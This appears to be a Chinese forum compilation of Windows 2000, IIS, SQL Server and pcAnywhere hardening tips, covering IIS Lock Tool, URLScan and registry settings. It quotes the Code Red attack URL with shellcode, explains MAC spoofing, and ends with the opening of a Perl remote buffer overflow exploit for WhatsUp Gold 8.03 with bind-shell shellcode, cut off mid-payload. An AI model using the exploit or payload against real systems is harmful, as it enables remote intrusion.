3>使用ACCESS来为数据库文件编码及加密。首先在选取 "工具->安全->加密/解密数据库,选取数据库(如:employer.mdb),然后接确定,接着会出现 "数据库加密后另存为"的窗口,存为:employer1.mdb。 接着employer.mdb就会被编码,然后存为employer1.mdb..
要注意的是,以上的动作并不是对数据库设置密码,而只是对数据库文件加以编码,目的是为了防止他人使用别的工具来查看数据库文件的内容。
接下来我们为数据库加密,首先以打开经过编码了的 employer1.mdb, 在打开时,选择"独占"方式。然后选取功能表的"工具->安全->设置数据库密码", 接着 输入密码即可。这样即使他人得到了employer1.mdb文件,没有密码他是无法看到 employer1.mdb的。
31.SQL SERVER是NT平台上用的最多的数据库系统,但是它的安全问题也必须引起重视。数据库中往往存在着最有价值的信息,一旦数据被窃后果不堪设想。
及时更新补丁程序。
说明:与NT一样,SQL SERVER的许多漏洞会由补丁程序来弥补。建议在安装补丁程序之前先在测试机器上做测试,同时提前做好目标服务器的数据备份。
给SA一个复杂的口令。
说明:SA具有对SQL SERVER数据库操作的全部权限。遗憾的是,一部分网管对数据库并不熟悉,建立数据库的工作由编程人员完成,而这部分人员往往只注重编写SQL 语句本身,对SQL SERVER数据库的管理不熟悉,这样很有可能造成SA口令为空。这对数据库安全是一个严重威胁。目前具有这种隐患的站点不在少数。
严格控制数据库用户的权限,轻易不要给让用户对表有直接的查询、更改、插入、删除权限,可以通过给用户以访问视图的权限,以及只具有执行存储过程的权限。
说明:用户如果对表有直接的操作权限,就会存在数据被破坏的危险。
制订完整的数据库备份与恢复策略。
32.目前,PCANYWHERE是最流行的基于2000的远程控制工具,同样也需要注意安全问题。
建议采用单独的用户名与口令,最好采用加密手段。千万不要采用与NT管理员一样的用户名与口令,也不要使用与NT集成的口令。同时在服务器端的设置时务必采用security options中的强加密方式,拒绝低加密水平的连接,同时采用口令加密与传输过程中的用户名与口令加密,以防止被嗅探到,还要限制连接次数,另外很重要的一点就是一定在protect item中设置高强度的口令,同时一定限制不能够让别人看到你的host端的任何设置,即便是要察看主机端的相关设置也必须要输入口令!
说明:PCANYWHERE 口令是远程控制的第一个关口,如果与NT的一样, 就失去了安全屏障。被攻破后就毫无安全可言。而如果采用单独的口令,即使攻破了PCANYWHERE,NT还有一个口令屏障。
及时安装较新的版本。
33.实际上,安全和应用在很多时候是矛盾的,因此,你需要在其中找到平衡点,毕竟服务器是给用户用而不是做OPEN HACK的,如果安全原则妨碍了系统应用,那么这个安全原则也不是一个好的原则。 网络安全是一项系统工程,它不仅有空间的跨度,还有时间的跨度。很多朋友(包括部分系统管理员)认为进行了安全配置的主机就是安全的,其实这其中有个误区:我只能说一台主机在一定的情况一定的时间上是安全的随着网络结构的变化、新的漏洞的发现,管理员/用户的操作,主机的安全状况是随时随地变化着的,只有让安全意识和安全制度贯穿整个过程才能做到真正的安全。
提高IIS 5.0网站伺服器的执行效率的八种方法
以下是提高IIS 5.0网站伺服器的执行效率的八种方法:
1. 启用HTTP的持续作用可以改善15~20%的执行效率。
2. 不启用记录可以改善5~8%的执行效率。
3. 使用 [独立] 的处理程序会损失20%的执行效率。
4. 增加快取记忆体的保存档案数量,可提高Active Server Pages之效能。
5. 勿使用CGI程式。
6. 增加IIS 5.0电脑CPU数量。
7. 勿启用ASP侦错功能。
8. 静态网页采用HTTP 压缩,大约可以减少20%的传输量。
34.启用HTTP的持续作用(Keep-Alive)时,IIS与浏览器的连线不会断线,可以改善执行效率,直到浏览器关闭时连线才会断线。因为维持「Keep-Alive」状态时,於每次用户端请求时都不须重新建立一个新的连接,所以将改善伺服器的效率。此功能为HTTP1.1预设的功能,HTTP 1.0加上Keep-Alive header也可以提供HTTP的持续作用功能。
启用HTTP的持续作用可以改善15~20%的执行效率。
如何启用HTTP的持续作用呢?步骤如下:在 [Internet服务管理员] 中,选取整个IIS电脑、或Web站台,於 [内容] 之 [主目录] 页,勾选 [HTTP的持续作用] 选项。
35.不启用记录可以改善5~8%的执行效率。如何设定不启用记录呢?步骤如下:
在 [Internet服务管理员] 中,选取整个IIS电脑、或Web站台,於 [内容] 之 [主目录] 页,不勾选 [启用记录] 选项。设定非独立的处理程序使用 [独立] 的处理程序会损失20%的执行效率,此处所谓 独立」系指将 [主目录]、[虚拟目录] 页之应用程式保护选项设定为 [高(独立的)] 时。因此 [应用程式保护] 设定为 [低 (IIS处理程序)] 时执行效率较高如何设定非「独立」的处理程序呢?步骤如下: 在 [Internet服务管理员] 中,选取整个IIS电脑、Web站台、或应用程式的起始目录。於 [内容] 之 [主目录]、[虚拟目录] 页,设定应用程式保护选项为 [低 (IIS处理程序)] 。
36.IIS 5.0将静态的网页资料暂存於快取(Cache)记忆体当中;IIS 4.0则将静态的网页资料暂存於档案当中。调整快取(Cache)记忆体的保存档案数量可以改善执行效率。ASP指令档案执行过後,会在暂存於快取(Cache)记忆体中以提高执行效能。增加快取记忆体的保存档案数量,可提高Active Server Pages之效能。可以设定所有在整个IIS电脑、「独立」Web站台、或「独立」应用程式上执行之应用程式的快取记忆体档案数量。如何设定快取(Cache)功能呢?步骤如下:在 [Internet服务管理员] 中选取整个IIS电脑、「独立」Web站台、或「独立」应用程式的起始目录。於 [内容] 之 [主目录]、[虚拟目录] 页,按下 [设定] 按钮时,即可由 [处理程序选项] 页设定[指令档快取记忆体] 。如何设定快取(Cache)记忆体档案数量呢?步骤如下:在[Internet服务管理员] 中,选取整个IIS电脑、或Web站台的起始目录。於 [内容] 之[伺服器扩充程式] 页,按下 [设定] 按钮。即可设定快取(Cache)记忆体档案数量。
37.使用CGI程式时,因为处理程序(Process)须不断地产生与摧毁,造成执行效率不佳。一般而言,执行效率比较如下: 静态网页(Static):100 ISAPI:50 ASP:10 CGI:1 换句话说,ASP比CGI可能快10倍,因此勿使用CGI程式可以改善IIS的执行效率。以弹性(Flexibility)而言:ASP > CGI > ISAPI > 静态网页(Static)。以安全(Security)而言:ASP(独立) = ISAPI(独立)= CGI > ASP(非独立) = ISAPI(非独立)= 静态网页(Static)
38.根据微软的测试报告,增加IIS 4.0电脑CPU数量,执行效率并不会改善多少;但是增加IIS 5.0电脑CPU数量,执行效率会几乎成正比地提供,换句话说,两颗CPU的IIS5.0电脑执行效率几乎是一颗CPU电脑的两倍,四颗CPU的IIS 5.0电脑执行效率几乎是一颗CPU电脑的四倍IIS 5.0将静态的网页资料暂存於快取(Cache)记忆体当中;IIS 4.0 则将静态的网页资料暂存於档案当中。调整快取(Cache)记忆体的保存档案数量可以改善执行效率。
39.勿启用ASP侦错功能可以改善执行效率。如何勿启用ASP侦错功能呢?步骤如下:於[Internet服务管理员] 中,选取Web站台、或应用程式的起始目录,按右键选择[内容],按 [主目录]、[虚拟目录] 或 [目录] 页,按下 [设定] 按钮,选择 [应用程式侦错] 页,不勾选 [启用ASP伺服器端指令侦错]、[启用ASP用户端指令侦错] 选项。
40.静态网页采用HTTP 压缩,大约可以减少20%的传输量。HTTP压缩功能启用或关闭,系针对整台IIS伺服器来设定。用户端使用IE 5.0浏览器连线到已经启用HTTP压缩IIS5.0之Web伺服器,才有HTTP压缩功能。如何启用HTTP压缩功能呢?步骤如下:若要启用HTTP 压缩功能,方法为在 [Internet服务管理员] 中,选取电脑之 [内容],於 [主要内容] 之下选取 [WWW服务]。然後按一下 [编辑] 按钮,於 [服务] 页上,选取 [压缩静态档案] 可以压缩静态档案,不选取 [压缩应用程式档案] 。 动态产生的内容档案(压缩应用程式档案)也可以压缩,但是须耗费额外CPU处理时间,若%Processor Time已经百分之八十或更多时,建议不要压缩
以上是对采用IIS作为WEB服务器的一些安全相关的设置与其性能调整的参数设置,可以最大化的优化你的IIS,不过个人认为如果不存在障碍,还是采用apache比较好一些,漏洞少,建议采用apache 1.3.24版本,因为最近经测试,apache 1.3.23之前的版本都存在溢出漏洞,不要怕,这种漏洞很少的,呵呵。另外,个人建议不要采用ASP安全性总不叫人放心,个人认为还是采用JSP好一些,安全性好,功能强大,绝对超值,呵呵,因为PHP也存在不少的洞洞
############################################################################################
附:IIS安全工具及其使用说明
一、IIS Lock Tool,快速设置IIS安全属性
IIS Lock Tool的推出,还要感谢红色代码,因为正是红色代码的大面积传播,致使微软设计发布这款帮助管理员们设置IIS安全性的工具。
(一)、IIS Lock Tool具有以下功能和特点
1、最基本功能,帮助管理员设置IIS安全性;
2、此工具可以在IIS4和IIS5上使用;
3、即使系统没有及时安装所有补丁,也能有效防止IIS4和IIS5的已知漏洞;
4、帮助管理员去掉对本网站不必要的一些服务,使IIS在满足本网站需求的情况下运行最少的服务;
5、具有两种使用模式:快捷模式和高级模式。快捷模式直接帮助管理员设置好IIS安全性,这种模式只适合于只有HTML和HTM静态网页的网站使用,因为设置完成以后,ASP不能运行;高级模式允许管理员自己设置各种属性,设置得当,对IIS系统任何功能均没有影响。
(二)、IIS Lock Tool的使用
1、软件下载和安装
IIS Lock Tool在微软网站下载,下载地址:
http://www.microsoft.com/Downloads/...ReleaseID=32362
安装很简单,需要注意的是,安装以后,程序不会在系统的【程序】菜单出现,也不会在【管理工具】出现,需要安装者在安装目录寻找运行该程序。
2、软件的使用
在以下的介绍中,我们将详细介绍每一步设置的意义和推荐设置,之所以详细介绍,是为了我们明白这些设置到底意味着什么,同时,和我们原来的安全设置相对照,避免出现设置完成以后,系统出现.
以上界面介绍了IIS Lock Tool的一些基本情况和使用时需要注意的地方:1)使用时应该选择针对本网站最少的服务,去掉不必要的服务;2)设置完成以后,建议对网站进行彻底检查,以确定设置对本网站是否合适;
在以上,点击【下一步】按钮
以上选择快捷模式还是高级模式来运行软件,在这里,软件介绍了两者模式的区别:
快捷模式:此设置模式关闭了IIS的一些高级服务属性,其中包括动态网页属性(ASP);所以,我们需要再重复一遍,选择快捷模式只适合提供静态页面的网站,当然,这种模式是相对最安全的。
高级模式:此模式运行安装者自定义各种属性,同时允许高级属性的运行。
快捷模式设置我们不必介绍,点击【下一步】按钮就可以设置完成。我们选择【Advanced Lockdown】(高级设置),点击【下一步】按钮
以上帮助管理员设置各种脚本映射,我们来看每一种映射应该怎样设置:
1)Disable support Active Server Pages(ASP),选择这种设置将使IIS不支持ASP功能;可以根据网站具体情况选择,一般不选择此项,因为网站一般要求运行ASP程序;
2)Disable support Index Server Web Interface(.idq,.htw,.ida),选择这一项将不支持索引服务,具体就是不支持.idq,.htw,.ida这些文件。我们先来看看到底什么是索引服务,然后来决定取舍。索引服务是IIS4中包含的内容索引引擎。你可以对它进行ADO调用并搜索你的站点,它为你提供了一个很好的web 搜索引擎。如果你的网站没有利用索引服务对网站进行全文检索,也就可以取消网站的这个功能,取消的好处是:1)减轻系统负担;2)有效防止利用索引服务漏洞的病毒和黑客,因为索引服务器漏洞可能使攻击者控制网站服务器,同时,暴露网页文件在服务器上的物理位置(利用.ida、.idq)。因此,我们一般建议在这一项前面打勾,也就是取消索引服务;
3)Disable support for Server Side Includes(.shtml,.shtm,.stm),取消服务器端包含;先来看看什么叫服务器端包含,SSI就是HTML文件中,可以通过注释行调用的命令或指针。SSI 具有强大的功能,只要使用一条简单的SSI 命令就可以实现整个网站的内容更新,动态显示时间和日期,以及执行shell和CGI脚本程序等复杂的功能。一般而言,我们没有用到这个功能,所以,建议取消;取消可以防止一些IIS潜在地漏洞;
4)Disable for Internet Data Connector(.idc),取消Internet数据库连接;先看Internet数据库连接的作用,它允许HTML页面和后台数据库建立连接,实现动态页面。需要注意的是,IIS4和IIS5中基本已经不使用idc,所以,建议在此项打勾,取消idc;
5)Disable support for Internet Printing (.printer),取消Internet打印;这一功能我们一般没有使用,建议取消;取消的好处是可以避免.printer远程缓存溢出漏洞,这个漏洞使攻击者可以利用这个漏洞远程入侵IIS 服务器,并以系统管理员(system)身份执行任意命令;
6)Disable support for .HTR Scripting(.htr),取消htr映射;攻击者通过htr构造特殊的URL请求,可能导致网站部分文件源代码暴露(包括ASP),建议在此项前面打勾,取消映射;
理解以上各项设置以后,我们可以根据本网站情况来决定取舍,一般网站除了ASP要求保留以外,其他均可以取消,也就是全消第一项前面的勾,其他全部打勾,按【下一步】按钮
以上设置可以让管理员选择一些IIS默认安装文件的保留与否,我们来看怎样选择:
1)Remove sample web files,删除web例子文件;建议删除,因为一般我们不需要在服务器上阅读这些文件,而且,这些文件可能让攻击者利用来阅读部分网页源程序代码(包括ASP);
2)Remove the Scripts vitual directory,删除脚本虚拟目录;建议删除;
3)Remove the MSDAC virtual directory,删除MSDAC虚拟目录,建议删除;
4)Disable Distribauted Authoring and Versioning(WebDAV),删除WEBDAV,WebDav主要允许管理者远程编写和修改页面,一般我们不会用到,建议删除,删除的好处是可以避免IIS5的一个WebDav漏洞,该漏洞可能导致服务器停止。
5)Set file permissions to prevent the IIS anouymous user from executing system utilities(such as cmd.exe,tftp.exe),防止匿名用户运行可执行文件,比如cmd.exe和tftp.exe;建议选择此项,因为红色代码和尼姆达均利用了以上所说的匿名执行可执行文件的功能;
6)Set file permissions to prevent the IIS anouymous user from writing to content directories,防止匿名用户对目录具有写权限,这个不要解释,建议选择;
设置以上选项以后,按【下一步】按钮
要求确认是否接受以上设置,选择【是】,开始对系统执行设置:
在以上中,我们可以看到对IIS的详细设置情况。设置完成以后,建议重新启动IIS。
############################################################################################
41.仔细观察IIS的漏洞,我们几乎可以得出这样一个结论,所有利用这些漏洞实现对网站攻击的手段均是构造特殊的URL来访问网站,一般有以下几种类型的URL可以利用漏洞:
1、特别长的URL,比如红色代码攻击网站的URL就是这样:
GET/default.idaXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u
9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u
00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200;
2、特殊字符或者字符串的URL,比如在URL后面加::$DATA可以看到网页(ASP)源代码;
3、URL中含有可执行文件名,最常见的就是有cmd.exe;
既然这些攻击利用特殊的URL来实现,所以,微软提供了这款专门过滤非法URL的安全工具,可以达到御敌于国门之外的效果,这款工具有以下特点和功能:
1、基本功能:过滤非法URL请求;
2、设定规则,辨别那些URL请求是合法的;这样,就可以针对本网站来制定专门的URL请求规则;同时,当有新的漏洞出现时,可以更改这个规则,达到防御新漏洞的效果;
3、程序提供一套URL请求规则,这个规则包含已经发现的漏洞利用特征,帮助管理员设置规则;
42.URLScan可以在微软的网站上下载,地址如下:
http://download.microsoft.com/downl...-US/UrlScan.exe
和一般软件一样安装,但是,此软件不能选择安装路径,安装完成以后,我们可以在System32/InetSvr/URLScan目录下找到以下文件:
urlscan.dll:动态连接库文件;
urlscan.inf:安装信息文件;
urlscan.txt:软件说明文件;
urlscan.ini:软件配置文件,这个文件很只要,因为对URLScan的所有配置,均有这个文件来完成。
43.软件的配置由urlscan.ini文件来完成,在配置此文件以前,我们需要了解一些基本知识。
1、urlscan配置文件的构造形式
urlscan配置文件必须遵从以下规则:
(1)此文件名必须为urlscan.ini;
(2)配置文件必须和urlscan.dll在同一目录;
(3)配置文件必须是标准ini文件结构,也就是由节,串和值组成;
(4)配置文件修改以后,必须重新启动IIS,使配置生效;
(5)配置文件由以下各节组成:
[Option]节,主要设置节;
[AllowVerbs]节,配置认定为合法URL规则设定,此设定与Option节有关;
[DenyVerbs]节,配置认定为非法URL规则设定,此设定与Option节有关;
[DenyHeaders]节,配置认定为非法的header在设立设置;
[AllowExtensions]节,配置认定为合法的文件扩展名在这里设置,此设定与Option节有关;
[DenyExtensions]节,配置认定为非法的文件扩展名在这里设置,此设定与Option节有关;
2、具体配置
(1)Option节的配置,因为Option节的设置直接影响到以后的配置,因此,这一节的设置特别重要。此节主要进行以下属性的设置:
UseAllowVerbs:使用允许模式检查URL请求,如果设置为1,所有没有在[AllowVerbs]节设置的请求都被拒绝;如果设置为0,所有没有在[DenyVerbs]设置的URL请求都认为合法;默认为1;
UseAllowExtensions:使用允许模式检测文件扩展名;如果设置为 1,所有没在[AllowExtensions]节设置的文件扩展名均认为是非法请求;如果设置为0,所有没在[DenyExtensions]节设置的扩展名均被认为是合法请求;默认为0;
EnableLogging:是否允许使用Log文件,如果为1,将在urlscan.dll的相同目录设置名为urlscan.log的文件记录所有过滤;
AllowLateScanning:允许其他URL过滤在URLScan过滤之前进行,系统默认为不允许0;
AlternateServerName:使用服务名代替;如果此节存在而且[RemoveServerHeader]节设置为0,IIS将在这里设置的服务器名代替默认的“Server”;
NormalizeUrlBeforeScan:在检测URL之前规格化URL;如果为1,URLScan将在IIS编码URL之前URL进行检测;需要提醒的是,只有管理员对URL解析非常熟悉的情况下才可以将其设置为0;默认为1;
VerifyNormalization:如果设置为1,UrlScan将校验URL规则,默认为1;此节设定与NormalizeUrlBeforeScan有关;
AllowHighBitCharacters:如果设置为1,将允许URL中存在所有字节,如果为0,含有非ASCII字符的URL将拒绝;默认为1;
AllowDotInPath:如果设置为1,将拒绝所有含有多个“.”的URL请求,由于URL检测在IIS解析URL之前,所以,对这一检测的准确性不能保证,默认为0;
RemoveServerHeader:如果设置为1,将把所有应答的服务头清除,默认为0;
(2)[AllowVerbs]节配置
如果UseAllowVerbs设置为1,此节设置的所有请求将被允许,一般设置以下请求:
GET、HEAD、POST
(3)[DenyVerbs]节配置
如果UseAllowVerbs设置为0,此节设置的所有请求将拒绝,一般设置以下请求:
PROPFIND、PROPPATCH、MKCOL、DELETE、PUT、COPY、MOVE、LOCK、UNLOCK
(4)[AllowExtensions]节设置
在这一节设置的所有扩展名文件将被允许请求,一般设置以下请求:
.asp、.htm、.html、.txt、.jpg、.jpeg、.gif,如果需要提供文件下载服务,需要增加.rar、.zip
(5)[DenyExtensions]节设置
在这一节设置的所有扩展名文件请求将被拒绝,根据已经发现的漏洞,我们可以在这一节增加内容,一般为以下设置:
.asa、可执行文件、批处理文件、日志文件、罕见扩展如:shtml、.printer等。
44.以上两个工具功能强大,可以真正实现对IIS的保护。IIS Lock Tool简单,相对而言,只是被动的防卫;UrlScan设置比较难,建议对IIS非常熟悉的管理员使用,只要设置得当,UrlScan的功能更加强大。在使用UrlScan的时候,切记不要设置一次万事大吉,需要不停跟踪新出现的漏洞,随时修改URLScan的配置文件。
45.Win2000的默认安装允许任何用户通过空用户得到系统所有账号/共享列表,这个本来是为了方便局域网用户共享文件的,但是一个远程用户也可以得到你的用户列表并使用暴力法破解用户密码。很多朋友都知道可以通过更改注册表Local_Machine\System\CurrentControlSet\Control\LSA-RestrictAnonymous = 1来禁止139空连接,实际上win2000的本地安全策略(如果是域服务器就是在域服务器安全和域安全策略中)就有这样的选项RestrictAnonymous(匿名连接的额外限制),这个选项有三个值: 0:None. Rely on default permissions(无,取决于默认的权限 1 :Do not allow enumeration of SAM accounts and shares(不允许枚举SAM帐号和共享) 2:No access without explicit anonymous permissions(没有显式匿名权限就不允许访问) 0这个值是系统默认的,什么限制都没有,远程用户可以知道你机器上所有的账号、组信息、共享目录、网络传输列表(NetServerTransportEnum等等,对服务器来说这样的设置非常危险。 1这个值是只允许非NULL用户存取SAM账号信息和共享信息。 2这个值是在win2000中才支持的,需要注意的是,如果你一旦使用了这个值,你的共享估计就全部完蛋了,所以我推荐你还是设为1比较好。 好了,入侵者现在没有办法拿到我们的用户列表,我们的账户安全了
46.禁止显示上次登陆的用户名HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\winlogon项中的Don’t Display Last User Name串数据改成1,这样系统不会自动显示上次的登录用户名。将服务器注册表HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\
WindowsNT\CurrentVersion\Winlogon项中的Don't Display Last User Name串数据修改为1,隐藏上次登陆控制台的用户名。其实,在2000的本地安全策略中也存在该选项
Winnt4.0修改注册表:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Current Version\Winlogon 中增加DontDisplayLastUserName,将其值设为1。
47.在注册表HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters中更改以下值可以帮助你防御一定强度的DoS攻击 SynAttackProtect REG_DWORD 2
EnablePMTUDiscovery REG_DWORD 0 NoNameReleaseOnDemand REG_DWORD 1
EnableDeadGWDetect REG_DWORD 0 KeepAliveTime REG_DWORD 300,000
PerFORMRouterDiscovery REG_DWORD 0 EnableICMPRedirects REG_DWORD 0
48.打开本地安全策略,选择IP安全策略,在这里我们可以定义自己的IP安全策略。一个IP安全过滤器由两个部分组成:过滤策略和过滤操作,过滤策略决定哪些报文应当引起过滤器的关注,过滤操作决定过滤器是“允许”还是“拒绝”报文的通过。要新建IP安全过滤器,必须新建自己的过滤策略和过滤操作:右击本机的IP安全策略,选择管理IP过滤器,在IP过滤器管理列表中建立一个新的过滤规则:ICMP_ANY_IN,源地址选任意IP,目标地址选本机,协议类型是ICMP,切换到管理过滤器操作,增加一个名为Deny的操作,操作类型为"阻止"(Block)。这样我们就有了一个关注所有进入ICMP报文的过滤策略和丢弃所有报文的过滤操作了。需要注意的是,在地址选项中有一个镜像选择,如果选中镜像,那么将会建立一个对称的过滤策略,也就是说当你关注any IP->my IP的时候,由于镜像的作用,实际上你也同时关注了my IP->any IP,你可以根据自己的需要选择或者放弃镜像。再次右击本机的IP安全策略,选择新建IP过滤策略,建立一个名称为ICMP Filter的过滤器,通过增加过滤规则向导,我们把刚刚定义的ICMP_ANY_IN过滤策略指定给ICMP Filter,然后在操作选框中选择我们刚刚定义的Deny操作,退出向导窗口,右击ICMP Filter并启用它,现在任何地址进入的ICMP报文都会被丢弃了。
虽然用IP sec能够对ICMP报文进行过滤,不过操作起来太麻烦,而且如果你只需要过滤特定的ICMP报文,还要保留一些常用报文(如主机不可达、网络不可达等),IP sec策略就力不从心了,我们可以利用Win2000的另一个强大工具路由与远程访问控制(Routing & Remote Access)来完成这些复杂的过滤操作。
路由与远程访问控制是Win2000用来管理路由表、配置VPN、控制远程访问、进行IP报文过滤的工具,默认情况下并没有安装,所以首先你需要启用它,打开"管理工具"->"路由与远程访问",右击服务器(如果没有则需要添加本机)选择"配置并启用路由及远程访问",这时配置向导会让你选择是什么样的服务器,一般来说,如果你不需要配置VPN服务器,那么选择"手动配置"就可以了,配置完成后,主机下将出现一个IP路由的选项,在"常规"中选择你想配置的网卡(如果你有多块网卡,你可以选择关闭某一块的ICMP),在网卡属性中点击"输入筛选器",添加一条过滤策略"from:ANY to:ANY 协议:ICMP 类型:8 :编码 丢弃"就可以了(类型8编码0就是Ping使用的ICMP_ECHO报文,如果要过滤所有的ICMP报文只需要将类型和编码都设置为255)
49.改变windows系统的一些默认值(例如:数据包的生存时间(TTL)值,不同系统有不同的值,有经验的人可以根据TTL的不同的值判断对方使用的是何种操作系统(例如windows 2000默认值128)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
DefaultTTL REG_DWORD 0-0xff(0-255 十进制,默认值128)
说明:指定传出IP数据包中设置的默认生存时间(TTL)值.TTL决定了IP数据包在到达
目标前在网络中生存的最大时间.它实际上限定了IP数据包在丢弃前允许通过的路由
器数量.有时利用此数值来探测远程主机操作系统.
50.防止ICMP重定向报文的攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
EnableICMPRedirects REG_DWORD 0x0(默认值为0x1)
说明:该参数控制Windows 2000是否会改变其路由表以响应网络设备(如路由器)发送给它的ICMP重定向消息,有时会被利用来干坏事.Win2000中默认值为1,表示响应ICMP重定向报文.
51.禁止响应ICMP路由通告报文
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\interface
PerformRouterDiscovery REG_DWORD 0x0(默认值为0x2)
说明:“ICMP路由公告”功能可造成他人计算机的网络连接异常,数据被窃听,计算机被用于流量攻击等严重后果.此问题曾导致校园网某些局域网大面积,长时间的网络异常.因此建议关闭响应ICMP路由通告报文.Win2000中默认值为2,表示当DHCP发送路由器发现选项时启用
52.防止SYN洪水攻击
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
SynAttackProtect REG_DWORD 0x2(默认值为0x0)
说明:SYN攻击保护包括减少SYN-ACK重新传输次数,以减少分配资源所保留的时
间.路由缓存项资源分配延迟,直到建立连接为止.如果synattackprotect=2,
则AFD的连接指示一直延迟到三路握手完成为止.注意,仅在TcpMaxHalfOpen和
TcpMaxHalfOpenRetried设置超出范围时,保护机制才会采取措施.
53.禁止C$、D$一类的缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
AutoShareServer、REG_DWORD、0x0
54.禁止ADMIN$缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
AutoShareWks、REG_DWORD、0x0
10.限制IPC$缺省共享
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
restrictanonymous REG_DWORD 0x0 缺省
0x1 匿名用户无法列举本机用户列表
0x2 匿名用户无法连接本机IPC$共享
说明:不建议使用2,否则可能会造成你的一些服务无法启动,如SQL Server
55.不支持IGMP协议
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
IGMPLevel REG_DWORD 0x0(默认值为0x2)
说明:记得Win9x下有个bug,就是用可以用IGMP使别人蓝屏,修改注册表可以修正这个
bug.Win2000虽然没这个bug了,但IGMP并不是必要的,因此照样可以去掉.改成0后用
route print将看不到那个讨厌的224.0.0.0项了.
56.设置arp缓存老化时间设置
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
ArpCacheLife REG_DWORD 0-0xFFFFFFFF(秒数,默认值为120秒)
ArpCacheMinReferencedLife REG_DWORD 0-0xFFFFFFFF(秒数,默认值为600)
说明:如果ArpCacheLife大于或等于ArpCacheMinReferencedLife,则引用或未引用的ARP缓存项在ArpCacheLife秒后到期.如果ArpCacheLife小于阿ARPCacheMinReferencedLife,未引用项在ArpCacheLife秒后到期,而引用项在ArpCacheMinReferencedLife秒后到期.每次将出站数据包发送到项的IP地址时,就会引用ARP缓存中的项。
57.禁止死网关监测技术
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
EnableDeadGWDetect REG_DWORD 0x0(默认值为ox1)
说明:如果你设置了多个网关,那么你的机器在处理多个连接有困难时,就会自动改用备份网关.有时候这并不是一项好主意,建议禁止死网关监测.
58.不支持路由功能
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
IPEnableRouter REG_DWORD 0x0(默认值为0x0)
说明:把值设置为0x1可以使Win2000具备路由功能,由此带来不必要的问题.
59.做NAT时放大转换的对外端口最大值
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\Parameters
MaxUserPort REG_DWORD 5000-65534(十进制)(默认值0x1388--十进制为5000)
说明:当应用程序从系统请求可用的用户端口数时,该参数控制所使用的最大端口数.正常情况下,短期端口的分配数量为1024-5000.将该参数设置到有效范围以外时,就会使用最接近的有效数值(5000或65534).使用NAT时建议把值放大点.
60.修改MAC地址
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\
找到右窗口的说明为"网卡"的目录,
比如说是{4D36E972-E325-11CE-BFC1-08002BE10318}
展开之,在其下的0000,0001,0002...的分支中找到"DriverDesc"的键值为你网卡的说明,比如说"DriverDesc"的值为"Intel? 82559 Fast Ethernet LAN on Motherboard"然后在右窗口新建一字符串值,名字为"Networkaddress",内容为你想要的MAC值,比如说是"004040404040"然后重启动计算机,ipconfig /all看看.
61.防止密码被DUMP,你只需在服务里面关掉Remote regisitery servicess
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
看看吧!希望你能有收获
IPSWITCH WhatsUp Gold 8.03 Remote Buffer Overflow exploit
Code: [Copy to clipboard]
#!/usr/bin/perl
# [LoWNOISE] NotmuchG.pl v.1.5
# ================================================
# IPSWITCH WhatsUp Gold ver8.03 Remote Buffer Overflow Exploit
# ================================================
#
# Exploit by ET LoWNOISE Colombia
# et(at)cyberspace.org
# Oct/2004
#
# Tested on WIN2K SP4
#
# The exploit takes control by overwriting the pointer of a Structured Exception Handler,
# installed by WhatsUP and points to a routine that handles exceptions.
# (http://www.thc.org/papers/Practical-SEH-exploitation.pdf Johnny Cyberpunk THC)
#
# The overflow string has to be around 4080 in length to generate an exception that can
# be manipulated by changing the SEH pointer (ret [815]).
#
#
# Bug Discovered by
# iDEFENSE Security Advisory 08.25.04
# http://www.idefense.com/application/poi/display?type=vulnerabilities
#
# Greetz to the midget, the m3 and los parces , the seltiks, p0ch1n,Ritt3r,Mav, f4lc0n..
use strict;
use IO::Socket::INET;
usage() unless (@ARGV == 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);
# Bind shellcode port 28876 (HDM, metasploit.org)
my $shellcode =
"\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52".
"\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1".
"\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a".
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01".
